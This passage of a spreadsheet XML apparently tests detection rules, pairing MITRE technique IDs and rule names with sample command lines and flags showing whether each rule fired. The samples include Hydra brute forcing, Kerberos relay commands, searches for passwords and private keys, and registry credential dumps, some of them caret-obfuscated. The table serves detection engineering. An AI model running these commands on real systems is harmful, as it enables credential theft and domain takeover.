      <c r="I1909" s="44" t="n"/>
      <c r="J1909" s="44" t="n"/>
      <c r="K1909" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1910" ht="15.75" customHeight="1" s="42">
      <c r="A1910" s="44" t="inlineStr">
        <is>
          <t>t1110</t>
        </is>
      </c>
      <c r="B1910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_hydra</t>
        </is>
      </c>
      <c r="C1910" s="44" t="inlineStr">
        <is>
          <t>HackTool - Hydra Password Bruteforce Execution</t>
        </is>
      </c>
      <c r="D1910" s="44" t="inlineStr">
        <is>
          <t>aaafa146-074c-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1910" s="44" t="inlineStr">
        <is>
          <t>hydra.exe -u -p -C .\flags.txt "^"USER"^" "^"PASS"^"</t>
        </is>
      </c>
      <c r="F1910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1910" s="44" t="n"/>
      <c r="J1910" s="44" t="n"/>
      <c r="K1910" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1911" ht="15.75" customHeight="1" s="42">
      <c r="A1911" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay</t>
        </is>
      </c>
      <c r="C1911" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelay Execution</t>
        </is>
      </c>
      <c r="D1911" s="44" t="inlineStr">
        <is>
          <t>e96253b8-6b3b-4f90-9e59-3b24b99cf9b4</t>
        </is>
      </c>
      <c r="E1911" s="44" t="inlineStr">
        <is>
          <t>KrbRelay.exe /spn ldap/dc.domain.local /clsid 9a404bab-4034-4b53-9ec4-332e185f2693 /rbcd attacker_acct$</t>
        </is>
      </c>
      <c r="F1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1911" s="44" t="n"/>
      <c r="J1911" s="44" t="n"/>
      <c r="K1911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1912" ht="15.75" customHeight="1" s="42">
      <c r="A1912" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay</t>
        </is>
      </c>
      <c r="C1912" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelay Execution</t>
        </is>
      </c>
      <c r="D1912" s="44" t="inlineStr">
        <is>
          <t>e96253b8-6b3b-4f90-9e59-3b24b99cf9b4</t>
        </is>
      </c>
      <c r="E1912" s="44" t="inlineStr">
        <is>
          <t>KrbRelay.exe	-spn	ldap/dc.domain.local	-clsid	9a404bab-4034-4b53-9ec4-332e185f2693	-rbcd	attacker_acct$</t>
        </is>
      </c>
      <c r="F1912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1912" s="44" t="n"/>
      <c r="J1912" s="44" t="n"/>
      <c r="K1912" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1913" ht="15.75" customHeight="1" s="42">
      <c r="A1913" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay</t>
        </is>
      </c>
      <c r="C1913" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelay Execution</t>
        </is>
      </c>
      <c r="D1913" s="44" t="inlineStr">
        <is>
          <t>e96253b8-6b3b-4f90-9e59-3b24b99cf9b4</t>
        </is>
      </c>
      <c r="E1913" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c KrbRelay.exe -sp^n ldap/dc.domain.local -clsi^d 9a404bab-4034-4b53-9ec4-332e185f2693 -rb^cd attacker_acct$</t>
        </is>
      </c>
      <c r="F1913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1913" s="44" t="n"/>
      <c r="J1913" s="44" t="n"/>
      <c r="K1913" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1914" ht="15.75" customHeight="1" s="42">
      <c r="A1914" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1914" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay</t>
        </is>
      </c>
      <c r="C1914" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelay Execution</t>
        </is>
      </c>
      <c r="D1914" s="44" t="inlineStr">
        <is>
          <t>e96253b8-6b3b-4f90-9e59-3b24b99cf9b4</t>
        </is>
      </c>
      <c r="E1914" s="44" t="inlineStr">
        <is>
          <t>KrbRelay.exe -spn  ldap/dc.domain.local -clsid  9a404bab-4034-4b53-9ec4-332e185f2693 -rbcd  attacker_acct$</t>
        </is>
      </c>
      <c r="F1914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1914" s="44" t="n"/>
      <c r="J1914" s="44" t="n"/>
      <c r="K1914" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1915" ht="15.75" customHeight="1" s="42">
      <c r="A1915" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay_remote</t>
        </is>
      </c>
      <c r="C1915" s="44" t="inlineStr">
        <is>
          <t>HackTool - RemoteKrbRelay Execution</t>
        </is>
      </c>
      <c r="D1915" s="44" t="inlineStr">
        <is>
          <t>a7664b14-75fb-4a50-a223-cb9bc0afbacf</t>
        </is>
      </c>
      <c r="E1915" s="44" t="inlineStr">
        <is>
          <t>RemoteKrbRelay.exe /clsid 9a404bab-4034-4b53-9ec4-332e185f2693 /target dc.domain.local /victim srv.domain.local</t>
        </is>
      </c>
      <c r="F1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1915" s="44" t="n"/>
      <c r="J1915" s="44" t="n"/>
      <c r="K1915" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1916" ht="15.75" customHeight="1" s="42">
      <c r="A1916" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay_remote</t>
        </is>
      </c>
      <c r="C1916" s="44" t="inlineStr">
        <is>
          <t>HackTool - RemoteKrbRelay Execution</t>
        </is>
      </c>
      <c r="D1916" s="44" t="inlineStr">
        <is>
          <t>a7664b14-75fb-4a50-a223-cb9bc0afbacf</t>
        </is>
      </c>
      <c r="E1916" s="44" t="inlineStr">
        <is>
          <t>RemoteKrbRelay.exe	-clsid	9a404bab-4034-4b53-9ec4-332e185f2693	-target	dc.domain.local	-victim	srv.domain.local</t>
        </is>
      </c>
      <c r="F1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1916" s="44" t="n"/>
      <c r="J1916" s="44" t="n"/>
      <c r="K1916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1917" ht="15.75" customHeight="1" s="42">
      <c r="A1917" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay_remote</t>
        </is>
      </c>
      <c r="C1917" s="44" t="inlineStr">
        <is>
          <t>HackTool - RemoteKrbRelay Execution</t>
        </is>
      </c>
      <c r="D1917" s="44" t="inlineStr">
        <is>
          <t>a7664b14-75fb-4a50-a223-cb9bc0afbacf</t>
        </is>
      </c>
      <c r="E1917" s="44" t="inlineStr">
        <is>
          <t>RemoteKrbRelay.exe "-clsid" 9a404bab-4034-4b53-9ec4-332e185f2693 "-target" dc.domain.local "-victim" srv.domain.local</t>
        </is>
      </c>
      <c r="F1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1917" s="44" t="n"/>
      <c r="J1917" s="44" t="n"/>
      <c r="K1917" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1918" ht="15.75" customHeight="1" s="42">
      <c r="A1918" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay_remote</t>
        </is>
      </c>
      <c r="C1918" s="44" t="inlineStr">
        <is>
          <t>HackTool - RemoteKrbRelay Execution</t>
        </is>
      </c>
      <c r="D1918" s="44" t="inlineStr">
        <is>
          <t>a7664b14-75fb-4a50-a223-cb9bc0afbacf</t>
        </is>
      </c>
      <c r="E1918" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c RemoteKrbRelay.exe -clsi^d 9a404bab-4034-4b53-9ec4-332e185f2693 -tar^get dc.domain.local -vic^tim srv.domain.local</t>
        </is>
      </c>
      <c r="F1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1918" s="44" t="n"/>
      <c r="J1918" s="44" t="n"/>
      <c r="K1918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1919" ht="15.75" customHeight="1" s="42">
      <c r="A1919" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelay_remote</t>
        </is>
      </c>
      <c r="C1919" s="44" t="inlineStr">
        <is>
          <t>HackTool - RemoteKrbRelay Execution</t>
        </is>
      </c>
      <c r="D1919" s="44" t="inlineStr">
        <is>
          <t>a7664b14-75fb-4a50-a223-cb9bc0afbacf</t>
        </is>
      </c>
      <c r="E1919" s="44" t="inlineStr">
        <is>
          <t>RemoteKrbRelay.exe -clsid  9a404bab-4034-4b53-9ec4-332e185f2693 -target  dc.domain.local -victim  srv.domain.local</t>
        </is>
      </c>
      <c r="F1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1919" s="44" t="n"/>
      <c r="J1919" s="44" t="n"/>
      <c r="K1919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1920" ht="15.75" customHeight="1" s="42">
      <c r="A1920" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C1920" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D1920" s="44" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E1920" s="44" t="inlineStr">
        <is>
          <t>KrbRelayUp.exe /relay /Domain domain.local /ComputerName target-dc</t>
        </is>
      </c>
      <c r="F1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1920" s="44" t="n"/>
      <c r="J1920" s="44" t="n"/>
      <c r="K1920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1921" ht="15.75" customHeight="1" s="42">
      <c r="A1921" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C1921" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D1921" s="44" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E1921" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c KrbRelayUp.exe relay -Dom^ain domain.local -Computer^Name target-dc</t>
        </is>
      </c>
      <c r="F1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1921" s="44" t="n"/>
      <c r="J1921" s="44" t="n"/>
      <c r="K1921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1922" ht="15.75" customHeight="1" s="42">
      <c r="A1922" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_krbrelayup</t>
        </is>
      </c>
      <c r="C1922" s="44" t="inlineStr">
        <is>
          <t>HackTool - KrbRelayUp Execution</t>
        </is>
      </c>
      <c r="D1922" s="44" t="inlineStr">
        <is>
          <t>12827a56-61a4-476a-a9cb-f3068f191073</t>
        </is>
      </c>
      <c r="E1922" s="44" t="inlineStr">
        <is>
          <t>KrbRelayUp.exe relay  -Domain  domain.local  -ComputerName  target-dc</t>
        </is>
      </c>
      <c r="F1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1922" s="44" t="n"/>
      <c r="J1922" s="44" t="n"/>
      <c r="K1922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1923" ht="15.75" customHeight="1" s="42">
      <c r="A1923" s="44" t="inlineStr">
        <is>
          <t>t1558.003</t>
        </is>
      </c>
      <c r="B1923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_setspn_spn_enumeration</t>
        </is>
      </c>
      <c r="C1923" s="44" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE</t>
        </is>
      </c>
      <c r="D1923" s="44" t="inlineStr">
        <is>
          <t>1eeed653-dbc8-4187-ad0c-eeebb20e6599</t>
        </is>
      </c>
      <c r="E1923" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c setspn.exe -T %USERDNSDOMAIN% -^q */*</t>
        </is>
      </c>
      <c r="F1923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1923" s="44" t="inlineStr">
        <is>
          <t>Potential SPN Enumeration Via Setspn.EXE (1eeed653-dbc8-4187-ad0c-eeebb20e6599)</t>
        </is>
      </c>
      <c r="J1923" s="44" t="n"/>
      <c r="K1923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1924" ht="15.75" customHeight="1" s="42">
      <c r="A1924" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C1924" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D1924" s="44" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E1924" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; { (Get-PSReadLineOption).HistorySavePath | ForEach-Object { Get-Content $_ } | Select-String "password", "-p", "key", "pwd", "pass" }</t>
        </is>
      </c>
      <c r="F1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1924" s="44" t="n"/>
      <c r="J1924" s="44" t="n"/>
      <c r="K1924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1925" ht="15.75" customHeight="1" s="42">
      <c r="A1925" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_console_history_file_access</t>
        </is>
      </c>
      <c r="C1925" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Console History Access Attempt via History File</t>
        </is>
      </c>
      <c r="D1925" s="44" t="inlineStr">
        <is>
          <t>f4ff7323-b5fc-4323-8b52-6b9408e15788</t>
        </is>
      </c>
      <c r="E1925" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { Get-ChildItem -Recurse 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' | Select-String "password", "-p", "key", "pwd", "pass" }"</t>
        </is>
      </c>
      <c r="F1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1925" s="44" t="n"/>
      <c r="J1925" s="44" t="n"/>
      <c r="K1925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1926" ht="15.75" customHeight="1" s="42">
      <c r="A1926" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_getprocess_lsass</t>
        </is>
      </c>
      <c r="C1926" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Process LSASS</t>
        </is>
      </c>
      <c r="D1926" s="44" t="inlineStr">
        <is>
          <t>b2815d0d-7481-4bf0-9b6c-a4c48a94b349</t>
        </is>
      </c>
      <c r="E1926" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {(Get-Process).where{$_.ProcessName -eq 'lsass'}"}</t>
        </is>
      </c>
      <c r="F1926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1926" s="44" t="n"/>
      <c r="J1926" s="44" t="n"/>
      <c r="K1926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1927" ht="15.75" customHeight="1" s="42">
      <c r="A1927" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C1927" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D1927" s="44" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E1927" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "dir\t-b\t-s\tc:\*.*key"</t>
        </is>
      </c>
      <c r="F1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1927" s="44" t="n"/>
      <c r="J1927" s="44" t="n"/>
      <c r="K1927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1928" ht="15.75" customHeight="1" s="42">
      <c r="A1928" s="44" t="inlineStr">
        <is>
          <t>t1552.004</t>
        </is>
      </c>
      <c r="B1928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_private_keys_recon</t>
        </is>
      </c>
      <c r="C1928" s="44" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D1928" s="44" t="inlineStr">
        <is>
          <t>213d6a77-3d55-4ce8-ba74-fcfef741974e</t>
        </is>
      </c>
      <c r="E1928" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set EXT=key&amp;&amp; dir c:\ /b /s *.%EXT%"</t>
        </is>
      </c>
      <c r="F1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1928" s="44" t="n"/>
      <c r="J1928" s="44" t="n"/>
      <c r="K1928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1929" ht="15.75" customHeight="1" s="42">
      <c r="A1929" s="44" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B1929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ditsnap</t>
        </is>
      </c>
      <c r="C1929" s="44" t="inlineStr">
        <is>
          <t>PUA - DIT Snapshot Viewer</t>
        </is>
      </c>
      <c r="D1929" s="44" t="inlineStr">
        <is>
          <t>d3b70aad-097e-409c-9df2-450f80dc476b</t>
        </is>
      </c>
      <c r="E1929" s="44" t="inlineStr">
        <is>
          <t>"C:\\Program Files\\ditsnap\\ditsnap.exe" -?</t>
        </is>
      </c>
      <c r="F1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1929" s="44" t="n"/>
      <c r="J1929" s="44" t="n"/>
      <c r="K1929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1930" ht="15.75" customHeight="1" s="42">
      <c r="A1930" s="44" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B1930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ditsnap</t>
        </is>
      </c>
      <c r="C1930" s="44" t="inlineStr">
        <is>
          <t>PUA - DIT Snapshot Viewer</t>
        </is>
      </c>
      <c r="D1930" s="44" t="inlineStr">
        <is>
          <t>d3b70aad-097e-409c-9df2-450f80dc476b</t>
        </is>
      </c>
      <c r="E1930" s="44" t="inlineStr">
        <is>
          <t>ditsnap.exe --help</t>
        </is>
      </c>
      <c r="F1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1930" s="44" t="n"/>
      <c r="J1930" s="44" t="n"/>
      <c r="K1930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1931" ht="15.75" customHeight="1" s="42">
      <c r="A1931" s="44" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B1931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ditsnap</t>
        </is>
      </c>
      <c r="C1931" s="44" t="inlineStr">
        <is>
          <t>PUA - DIT Snapshot Viewer</t>
        </is>
      </c>
      <c r="D1931" s="44" t="inlineStr">
        <is>
          <t>d3b70aad-097e-409c-9df2-450f80dc476b</t>
        </is>
      </c>
      <c r="E1931" s="44" t="inlineStr">
        <is>
          <t>C:\\Program Files\\ditsnap\\ditsnap</t>
        </is>
      </c>
      <c r="F1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1931" s="44" t="n"/>
      <c r="J1931" s="44" t="n"/>
      <c r="K1931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1932" ht="15.75" customHeight="1" s="42">
      <c r="A1932" s="44" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B1932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ditsnap</t>
        </is>
      </c>
      <c r="C1932" s="44" t="inlineStr">
        <is>
          <t>PUA - DIT Snapshot Viewer</t>
        </is>
      </c>
      <c r="D1932" s="44" t="inlineStr">
        <is>
          <t>d3b70aad-097e-409c-9df2-450f80dc476b</t>
        </is>
      </c>
      <c r="E1932" s="44" t="inlineStr">
        <is>
          <t>ditsnap.exe  /?</t>
        </is>
      </c>
      <c r="F1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1932" s="44" t="n"/>
      <c r="J1932" s="44" t="n"/>
      <c r="K1932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1933" ht="15.75" customHeight="1" s="42">
      <c r="A1933" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C1933" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D1933" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E1933" s="44" t="inlineStr">
        <is>
          <t>reg query "HKCU" /f "password" /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F1933" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1933" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J1933" s="44" t="n"/>
      <c r="K1933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1934" ht="15.75" customHeight="1" s="42">
      <c r="A1934" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_enumeration_for_credentials_in_registry</t>
        </is>
      </c>
      <c r="C1934" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry</t>
        </is>
      </c>
      <c r="D1934" s="44" t="inlineStr">
        <is>
          <t>e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1</t>
        </is>
      </c>
      <c r="E1934" s="44" t="inlineStr">
        <is>
          <t>reg query /f password /t REG_SZ /s HKCU</t>
        </is>
      </c>
      <c r="F1934" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1934" s="44" t="inlineStr">
        <is>
          <t>Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J1934" s="44" t="n"/>
      <c r="K1934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1935" ht="15.75" customHeight="1" s="42">
      <c r="A1935" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C1935" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D1935" s="44" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E1935" s="44" t="inlineStr">
        <is>
          <t>reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /t REG_SZ /s</t>
        </is>
      </c>
      <c r="F1935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1935" s="44" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J1935" s="44" t="n"/>
      <c r="K1935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1936" ht="15.75" customHeight="1" s="42">
      <c r="A1936" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C1936" s="44" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D1936" s="44" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E1936" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg ex^port HKCU\Software\SimonTatham\PuTTY\Sessions C:\Windows\Temp\test.reg"</t>
        </is>
      </c>
      <c r="F1936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1936" s="44" t="inlineStr">
        <is>
